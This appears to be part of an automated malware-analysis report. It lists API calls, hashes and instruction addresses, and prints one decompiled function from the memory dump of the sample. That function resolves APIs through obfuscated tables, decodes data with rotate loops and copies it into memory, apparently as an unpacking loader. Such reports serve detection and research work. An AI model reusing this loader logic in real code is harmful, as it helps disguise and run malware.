0x021117cf
0x021117cf
0x021117d2
0x021117de
0x021117ef
0x021117f5
0x021117f5
0x02111801
0x02111801
0x02111806
0x0211181b
0x02111821
0x02111824
0x02111826

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 021114AB
VirtualProtect.KERNEL32(?), ref: 021115B1

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction ID: 9eeabb80cca56c1e38f84e87ceedab6edcbad364c6617cb46c9649cf4b2d4570
Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction Fuzzy Hash: 80C15C72940604EFFF14CFA0C889B597BB1FF24311F1860A9EE0D9E19AD77415A0CB68

Uniqueness

Uniqueness Score: -1.00%

Function 021132EB, Relevance: 3.2, APIs: 2, Instructions: 151comCOMMON

Download Yara Rule

APIs

OleUninitialize.OLE32(02112C25), ref: 02113354
OleInitialize.OLE32(00000000,00000000), ref: 0211349A

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID: InitializeUninitialize
String ID:
API String ID: 3442037557-0
Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction ID: f690ea9f5e6b5f40e850973e3134a3138f5d32868ba5243d885cef38959dc7ff
Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction Fuzzy Hash: 72519A72D04619DFEF14CFA4C8897AABBF1FF54311F0851AADD49EA189C7340590CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02113726, Relevance: 2.2, APIs: 1, Instructions: 735
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E02113726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				void* _t425;
				signed int _t427;
				signed int _t429;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t457;
				signed int _t459;
				signed int _t461;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				signed int _t481;
				signed int _t486;
				signed int _t489;
				void* _t493;
				void* _t495;
				signed int _t497;
				signed int _t500;
				void* _t503;
				signed int _t504;
				signed int _t507;
				signed int _t509;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				signed int _t520;
				signed int _t525;
				int _t527;
				int _t531;
				void* _t567;
				signed int _t568;
				signed int _t570;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t590;
				void* _t592;
				void* _t625;
				intOrPtr* _t626;
				signed int _t627;
				void* _t629;
				signed int _t634;
				signed int _t637;
				signed int _t639;
				void* _t640;
				void* _t641;
				signed int _t657;
				signed int _t660;
				signed int* _t672;
				signed int* _t673;
				signed int* _t676;
				intOrPtr* _t677;
				signed int* _t678;

				_t625 = __esi;
				_t584 = __edi;
				_t567 = __edx;
				_t504 = __ecx;
				_t493 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
					_push(__ebx + 0x4354be);
					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_push(_v20);
					_pop( *_t6);
				}
				_t416 = _t493 + 0x435323;
				if( *(_t493 + 0x4351eb) == 0) {
					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
					 *_t672 = _t657;
					 *(_t493 + 0x4351eb) = 0 ^ _t489;
					_t657 = 0;
					_t416 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_push(_t416);
				_t417 = _t493 + 0x43569a;
				if( *(_t493 + 0x4354fd) == 0) {
					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
					_v12 = _t584;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
					_t584 = _v12;
					_t417 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
				_push(_v16);
				_pop( *_t25);
				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
					_push(_v12);
					_pop( *_t31);
				}
				_push(_t625);
				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
					_t481 = _t493 + 0x4353d6;
					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
						_push(_v20);
						_pop( *_t39);
						_t481 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
					_push(_v12);
					_pop( *_t43);
				}
				_push(_t584);
				if( *(_t493 + 0x4356f5) == 0) {
					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
					_t504 = _t504;
				}
				_push(_a4);
				_pop( *_t53);
				_push(_v12);
				_pop(_t626);
				if( *(_t493 + 0x4358dc) == 0) {
					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
					_v16 = _t584;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
					if( *(_t493 + 0x435268) == 0) {
						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
						_t567 = _t567;
						_t477 =  *_t672;
						_t672 =  &(_t672[1]);
					}
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
					_t626 = _t626;
				}
				_v12 = _t504;
				_t585 = 0 ^ _a8;
				_t507 = _v12;
				if( *(_t493 + 0x435675) == 0) {
					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
					_t507 = _t507;
				}
				if( *(_t493 + 0x435732) == 0) {
					if( *(_t493 + 0x435142) == 0) {
						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
						_v16 = _t626;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
						_t626 = _v16;
					}
					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
					_v20 = _t507;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
						_push(_v12);
						_pop( *_t115);
					}
				}
				_push( *((intOrPtr*)(_t626 + 8)));
				if( *(_t493 + 0x435898) == 0) {
					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
					_v12 = _t585;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
					_t585 = _v12;
				}
				_push(_t585);
				if( *(_t493 + 0x4358d8) == 0) {
					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
					 *_t672 = _t567;
					 *(_t493 + 0x4358d8) = 0 ^ _t466;
					_t567 = 0;
				}
				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
					if( *(_t493 + 0x4355f9) == 0) {
						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
						_t585 = _t585;
					}
					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
						_push(_v16);
						_pop( *_t145);
						_t462 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t146 = _t462;
					_push(_v16);
					_pop( *_t148);
				}
				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
				_push(_v12);
				_t509 =  &_v20;
				_t660 = _t657;
				_push(_t509);
				if( *(_t493 + 0x4359bd) == 0) {
					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
					_v20 = _t509;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
					_t509 = (_v20 & 0x00000000) +  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_t627 = _t626 +  *_t626;
				if( *(_t493 + 0x4357f2) == 0) {
					_push(_t509);
					if( *(_t493 + 0x4355bd) == 0) {
						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
						_v16 = _t627;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
						_t627 = _v16;
					}
					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
					_push(0xc);
					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
						 *_t672 = _t627;
						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
						_t627 = 0;
					}
					_push( *((intOrPtr*)(_t493 + 0x435346)));
					if( *(_t493 + 0x435815) == 0) {
						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
						_t627 = _t627;
					}
					_push(0x2e);
					_push( *((intOrPtr*)(_t493 + 0x435a19)));
					if( *(_t493 + 0x435a09) == 0) {
						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
						_v12 = _t509;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
						_t509 = _v12;
					}
					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
					if( *(_t493 + 0x4359dd) == 0) {
						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
						_t509 = _t509;
						_pop( *_t207);
						_t451 = _v12;
					}
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
					_t660 = _t660;
					_t509 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				do {
					asm("movsb");
					_t509 = _t509 - 1;
				} while (_t509 != 0);
				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
				_t512 = _t509;
				if( *(_t493 + 0x4355d5) == 0) {
					_push(_t493 + 0x435736);
					if( *(_t493 + 0x4352bf) == 0) {
						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
						_t585 = _t585;
					}
					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
					_push(_t585);
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
					if( *(_t493 + 0x435264) == 0) {
						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
						_v12 = _t567;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
						_t567 = _v12;
					}
				}
				_pop( *_t243);
				_t514 = _t512 & 0x00000000 ^ _v20;
				if( *(_t493 + 0x4359ed) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
					_t660 = _t660;
					_t514 =  *_t672;
					_t672 =  &(_t672[1]);
				}
				_t587 =  *_t672;
				_t673 =  &(_t672[1]);
				if( *(_t493 + 0x4351b7) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
					_v16 = _t514;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
					_pop( *_t261);
					_t514 = _v16;
				}
				_v12 = _t421;
				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
				_push(_t493);
				do {
					_t425 =  *_t629 & 0x000000ff;
					_t629 = _t629 + 1;
					if(_t425 == 0) {
						goto L64;
					}
					_push(_t514);
					 *_t673 = 1;
					_t515 = _t629;
					 *_t266 = _t629;
					_push(_v20);
					_pop(_t567);
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t495 = _t425;
						_t425 = _t567;
						asm("ror ebx, cl");
						_t269 =  &_v8;
						 *_t269 = _v8 - 1;
					} while ( *_t269 != 0);
					 *_t673 = _t515;
					_t425 = _t495;
					 *_t271 = 0;
					_t514 = 0 ^ _v12;
					L64:
					asm("stosb");
					_t514 = _t514 - 1;
				} while (_t514 != 0);
				_pop( *_t273);
				_t497 = 0 ^ _v12;
				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
					 *_t279 = _t425;
					_push(_v12);
					_pop( *_t281);
				}
				if( *(_t497 + 0x435122) == 0) {
					_t283 = _t497 + 0x435182; // 0x435182
					if( *(_t497 + 0x4357e2) == 0) {
						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
						_v12 = _t587;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
						_t587 = _v12;
					}
					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
					_v20 = _t567;
					 *(_t497 + 0x435122) = _t425;
					_t567 = _v20;
					if( *(_t497 + 0x4354ca) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
						 *_t673 = _t660;
						 *(_t497 + 0x4354ca) = _t425;
						_t660 = 0;
					}
				}
				if(_a4 != 0) {
					if( *(_t497 + 0x435250) == 0) {
						_t303 = _t497 + 0x4358c0; // 0x4358c0
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
						 *_t673 = _t629;
						 *(_t497 + 0x435250) = 0 ^ _t425;
						_t629 = 0;
					}
					if(_a8 != 0) {
						if( *(_t497 + 0x435213) == 0) {
							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
							_t587 = _t587;
						}
						_t425 = E02111C5D(_t497, _t514, _t567, _t629, _a8, _a4);
					}
				}
				_pop( *_t315);
				_t568 = _v20;
				if( *(_t497 + 0x4352f3) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
					_push(_t514);
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
					_t568 =  *_t673;
					_t673 = _t673 - 0xfffffffc;
				}
				if(_t568 > 0) {
					if( *(_t497 + 0x4354b6) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
						_v12 = _t587;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
					}
					_push(_a4);
					_pop( *_t339);
					_push(_v16);
					_pop(_t590);
					_push(_t590);
					 *_t673 = _t629;
					_t520 =  *(_t590 + 4);
					_t634 = 0;
					if( *(_t497 + 0x4350bc) == 0) {
						_t343 = _t497 + 0x4355b5; // 0x4355b5
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
						_push(0);
						 *_t673 = _t660;
						 *(_t497 + 0x4350bc) = 0 ^ _t425;
						_t520 =  *_t673;
						_t673 =  &(_t673[1]);
					}
					_v16 = _t497;
					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
					_t500 = _v16;
					if( *(_t500 + 0x435659) == 0) {
						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
						_v12 = _t590;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
						_t590 = _v12;
						 *_t357 = _t520;
						_t520 = _t520 & 0x00000000 ^ _v12;
						 *_t359 = _t427;
						_t427 = _v16;
					}
					_push(_t520);
					_push(_t520);
					_v16 = _t634;
					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
					_t637 = _v16;
					if( *(_t500 + 0x4353fa) == 0) {
						_t365 = _t500 + 0x43595c; // 0x43595c
						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
						_v16 = _t590;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
						_t590 = _v16;
						_t570 = (_t570 & 0x00000000) +  *_t673;
						_t673 = _t673 - 0xfffffffc;
					}
					_v16 = _t520;
					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
					_push( *_t673);
					 *_t673 =  *_t673 - _t570;
					_pop(_t525);
					if( *(_t500 + 0x435984) == 0) {
						_t379 = _t500 + 0x435829; // 0x435829
						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
						_t590 = _t590;
						_t570 =  *_t673;
						_t673 = _t673 - 0xfffffffc;
						 *_t385 = _t379;
						_t525 = _t525 & 0x00000000 | _v12;
					}
					_t640 = _t639 + _t525;
					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
					_t503 = _t500;
					if( *(_t503 + 0x43579a) == 0) {
						_t389 = _t503 + 0x4359c1; // 0x4359c1
						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
						_v16 = _t527;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
						 *_t397 = _t389;
						_t570 = _t570 & 0x00000000 | _v12;
						 *_t399 = _t570;
						_t527 = _v20;
					}
					memcpy(_t590, _t640, _t527);
					_t676 =  &(_t673[3]);
					_t592 = _t640 + _t527 + _t527;
					_push(_a8);
					_pop( *_t402);
					_push(_v20);
					_pop(_t641);
					if( *(_t503 + 0x4352b7) == 0) {
						_t405 = _t503 + 0x435237; // 0x435237
						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
						_v20 = _t641;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
						_t641 = _v20;
						_t570 =  *_t676;
						_t676 = _t676 - 0xfffffffc;
					}
					_t677 = _t676 - 0xfffffffc;
					_push(0 ^  *_t676);
					 *_t677 =  *_t677 - _t570;
					_pop(_t531);
					_t429 = memcpy(_t592, _t641, _t531);
					_t678 = _t677 + 0xc;
					 *_t414 = _t429;
					_t629 =  *_t678;
					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
					_t673 =  &(_t678[4]);
					_t587 = _t629 + (0 | _v12) + (0 | _v12);
				}
				return _t425;
			}

0x02113726
0x02113726
0x02113726
0x02113726
0x02113726
0x02113733
0x0211373b
0x02113743
0x02113746
0x02113749
0x02113749
0x0211374f
0x0211375c
0x02113766
0x0211376e
0x02113775
0x0211377b
0x0211377e
0x02113781
0x02113781
0x02113784
0x02113785
0x02113792
0x02113795
0x0211379b
0x021137a3
0x021137aa
0x021137b0
0x021137b5
0x021137b8
0x021137b8
0x021137c3
0x021137c6
0x021137c9
0x021137d6
0x021137e5
0x021137e8
0x021137eb
0x021137eb
0x021137f1
0x021137f9
0x021137fb
0x02113808
0x02113818
0x0211381b
0x0211381e
0x0211382a
0x0211382d
0x0211382d
0x02113838
0x0211383b
0x0211383e
0x0211383e
0x02113844
0x0211384c
0x0211385a
0x02113866
0x0211386d
0x02113873
0x02113873
0x02113874
0x02113877
0x0211387a
0x0211387d
0x02113885
0x02113895
0x0211389b
0x021138a3
0x021138aa
0x021138b3
0x021138c0
0x021138c9
0x021138d5
0x021138dc
0x021138e2
0x021138e5
0x021138e8
0x021138e8
0x021138f1
0x021138f8
0x021138fe
0x021138fe
0x021138ff
0x02113907
0x02113909
0x02113913
0x0211391c
0x02113928
0x0211392f
0x02113935
0x02113935
0x0211393d
0x0211394a
0x0211394c
0x02113952
0x0211395a
0x02113961
0x02113967
0x02113967
0x0211396a
0x02113970
0x02113978
0x0211397f
0x0211398f
0x021139bd
0x021139c0
0x021139c3
0x021139c3
0x0211398f
0x021139c9
0x021139d3
0x021139dc
0x021139e2
0x021139ea
0x021139f1
0x021139f7
0x021139f7
0x021139fa
0x02113a02
0x02113a06
0x02113a0e
0x02113a15
0x02113a1b
0x02113a1b
0x02113a23
0x02113a2c
0x02113a30
0x02113a3c
0x02113a43
0x02113a49
0x02113a49
0x02113a4c
0x02113a59
0x02113a81
0x02113a84
0x02113a87
0x02113a8f
0x02113a92
0x02113a92
0x02113a96
0x02113a99
0x02113a9c
0x02113a9c
0x02113aa8
0x02113aab
0x02113ab8
0x02113aba
0x02113abb
0x02113ac3
0x02113acd
0x02113ad3
0x02113adb
0x02113ae2
0x02113af1
0x02113af4
0x02113af4
0x02113af7
0x02113b00
0x02113b06
0x02113b0e
0x02113b17
0x02113b1d
0x02113b25
0x02113b2c
0x02113b32
0x02113b32
0x02113b35
0x02113b3b
0x02113b44
0x02113b4d
0x02113b55
0x02113b5c
0x02113b62
0x02113b62
0x02113b63
0x02113b70
0x02113b7a
0x02113b86
0x02113b8d
0x02113b93
0x02113b93
0x02113b94
0x02113b96
0x02113ba3
0x02113bb1
0x02113bb7
0x02113bbf
0x02113bc6
0x02113bcc
0x02113bcc
0x02113bdb
0x02113be8
0x02113bf2
0x02113bfe
0x02113c05
0x02113c0b
0x02113c0c
0x02113c0f
0x02113c0f
0x02113c18
0x02113c1f
0x02113c25
0x02113c2c
0x02113c2f
0x02113c2f
0x02113c32
0x02113c32
0x02113c33
0x02113c33
0x02113c44
0x02113c50
0x02113c57
0x02113c5d
0x02113c65
0x02113c6d
0x02113c75
0x02113c7e
0x02113c8a
0x02113c91
0x02113c97
0x02113c97
0x02113c98
0x02113c9e
0x02113ca4
0x02113cab
0x02113cb9
0x02113cc2
0x02113cc8
0x02113cd0
0x02113cd7
0x02113cdd
0x02113cdd
0x02113cb9
0x02113ce6
0x02113ce9
0x02113cf3
0x02113cf6
0x02113d02
0x02113d09
0x02113d0f
0x02113d12
0x02113d15
0x02113d15
0x02113d1a
0x02113d1d
0x02113d27
0x02113d30
0x02113d36
0x02113d3e
0x02113d45
0x02113d50
0x02113d53
0x02113d53
0x02113d56
0x02113d61
0x02113d66
0x02113d67
0x02113d67
0x02113d6a
0x02113d6d
0x00000000
0x00000000
0x02113d6f
0x02113d71
0x02113d78
0x02113d7f
0x02113d82
0x02113d85
0x02113d86
0x02113d8d
0x02113d8d
0x02113d8f
0x02113d91
0x02113d93
0x02113d95
0x02113d95
0x02113d95
0x02113d9c
0x02113da3
0x02113da8
0x02113dab
0x02113dae
0x02113dae
0x02113daf
0x02113daf
0x02113db4
0x02113db7
0x02113dc1
0x02113dcf
0x02113dd6
0x02113dd9
0x02113ddc
0x02113ddc
0x02113de9
0x02113deb
0x02113df9
0x02113e01
0x02113e07
0x02113e0f
0x02113e16
0x02113e1c
0x02113e1c
0x02113e1f
0x02113e25
0x02113e2c
0x02113e32
0x02113e3c
0x02113e3e
0x02113e46
0x02113e4d
0x02113e53
0x02113e53
0x02113e3c
0x02113e58
0x02113e61
0x02113e63
0x02113e6a
0x02113e72
0x02113e79
0x02113e7f
0x02113e7f
0x02113e84
0x02113e8d
0x02113e8f
0x02113e9b
0x02113ea2
0x02113ea8
0x02113ea8
0x02113eaf
0x02113eaf
0x02113e84
0x02113eb4
0x02113eb7
0x02113ec1
0x02113eca
0x02113ed0
0x02113ed6
0x02113edd
0x02113eea
0x02113eed
0x02113eed
0x02113ef3
0x02113f00
0x02113f27
0x02113f2d
0x02113f35
0x02113f3c
0x02113f42
0x02113f45
0x02113f48
0x02113f4b
0x02113f4e
0x02113f4f
0x02113f52
0x02113f5a
0x02113f5c
0x02113f64
0x02113f67
0x02113f6e
0x02113f74
0x02113f76
0x02113f7d
0x02113f86
0x02113f89
0x02113f89
0x02113f8c
0x02113f98
0x02113f9a
0x02113fa4
0x02113fa8
0x02113fae
0x02113fb6
0x02113fbd
0x02113fc3
0x02113fcc
0x02113fcf
0x02113fd2
0x02113fd5
0x02113fd5
0x02113fd8
0x02113fd9
0x02113fda
0x02113fe5
0x02113fe7
0x02113ff1
0x02113ff4
0x02113ffb
0x02114001
0x02114009
0x02114010
0x02114016
0x0211401f
0x02114022
0x02114022
0x02114025
